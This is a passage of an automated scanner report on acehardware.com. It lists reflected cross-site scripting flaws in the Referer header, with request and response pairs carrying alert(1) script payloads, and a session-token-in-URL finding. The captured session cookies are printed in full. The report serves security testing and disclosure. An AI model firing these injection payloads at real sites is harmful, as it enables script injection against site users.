Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=9404a"><script>alert(1)</script>c392790ff13

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 71470
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZo
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=lawng004;u1=;u2=5;u3=;u4=;u5=http://www.google.com/search?hl=en&q=9404a"><script>alert(1)</script>c392790ff13;ord=1;num=72593060?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.9. http://www.acehardware.com/infodept/iskills.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /infodept/iskills.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d78d7"><script>alert(1)</script>f9b51a2c452 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /infodept/iskills.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=d78d7"><script>alert(1)</script>f9b51a2c452

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:24:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 104621
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZo
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=proje428;u1=;u2=5;u3=;u4=;u5=http://www.google.com/search?hl=en&q=d78d7"><script>alert(1)</script>f9b51a2c452;ord=1;num=38297417?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.10. http://www.acehardware.com/paintingtips/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /paintingtips/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1b6b"><script>alert(1)</script>cc551bcfcf7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /paintingtips/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=d1b6b"><script>alert(1)</script>cc551bcfcf7

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:56 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 76193
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=paint169;u1=;u2=5;u3=;u4=;u5=http://www.google.com/search?hl=en&q=d1b6b"><script>alert(1)</script>cc551bcfcf7;ord=1;num=21734939?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.11. http://www.acehardware.com/product/close.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/close.gif

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95293"><script>alert(1)</script>54cee8eac57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/close.gif HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=95293"><script>alert(1)</script>54cee8eac57
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556; fsr.session={"v":1,"rid":"1293636636322_310950","pv":5,"to":5,"c":"http://www.acehardware.com/paintingtips/index.jsp","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR7e524357145a415c52134c4a56555c570f1d0545551c4f1c00; rvp=4356432:3388719:; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DProduct%253A%25204356432%253A%2520Milwaukee%2520M12%25203/8in%2520Drill-%2520Driver%2520%2526%25201/4in%2520Impact%2520Driver%2520Combo%2520Kit%2520%25282494-22%2529%7C1293641712372%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1293639914850; __g_c=w%3A1%7Cb%3A7%7Cr%3A%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 17:39:41 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=VC18NbydG3Spt548YdKgTnvRFcwSL7JVb8SJcLvh28J1bq0gTDvL!-141289455; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=95293"><script>alert(1)</script>54cee8eac57;ord=1;num=4535020?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.12. http://www.acehardware.com/product/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c071"><script>alert(1)</script>347d19afa7a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=8c071"><script>alert(1)</script>347d19afa7a

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:24:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=8c071"><script>alert(1)</script>347d19afa7a;ord=1;num=66443746?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.13. http://www.acehardware.com/product/loading.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /product/loading.gif

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac94"><script>alert(1)</script>97043137871 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/loading.gif HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=bac94"><script>alert(1)</script>97043137871
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556; fsr.session={"v":1,"rid":"1293636636322_310950","pv":5,"to":5,"c":"http://www.acehardware.com/paintingtips/index.jsp","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR7e524357145a415c52134c4a56555c570f1d0545551c4f1c00; rvp=4356432:3388719:; __g_c=w%3A1%7Cb%3A7%7Cr%3A%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DProduct%253A%25204356432%253A%2520Milwaukee%2520M12%25203/8in%2520Drill-%2520Driver%2520%2526%25201/4in%2520Impact%2520Driver%2520Combo%2520Kit%2520%25282494-22%2529%7C1293641712372%3B; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1293639914850

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 17:39:42 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=YBYzNbypWkmzhlxH3hZ8f6573Lyz4kGVGNv8HTmcNTTJLv80cdD2!-141289455; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=bac94"><script>alert(1)</script>97043137871;ord=1;num=43001504?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.14. http://www.acehardware.com/reviews/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /reviews/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71c17"><script>alert(1)</script>526df281b87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /reviews/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=71c17"><script>alert(1)</script>526df281b87

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:24:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=71c17"><script>alert(1)</script>526df281b87;ord=1;num=27813736?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

1.15. http://www.acehardware.com/shop/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /shop/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe6b"><script>alert(1)</script>d8b123963b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;
Referer: http://www.google.com/search?hl=en&q=abe6b"><script>alert(1)</script>d8b123963b2

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 16:23:54 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=abe6b"><script>alert(1)</script>d8b123963b2;ord=1;num=56973004?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

2. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.acehardware.com
Path:   /storeLocServ

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30&lat=29.763&lon=-95.363&time=1293639560873 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
X-Prototype-Version: 1.4.0
X-Requested-With: XMLHttpRequest
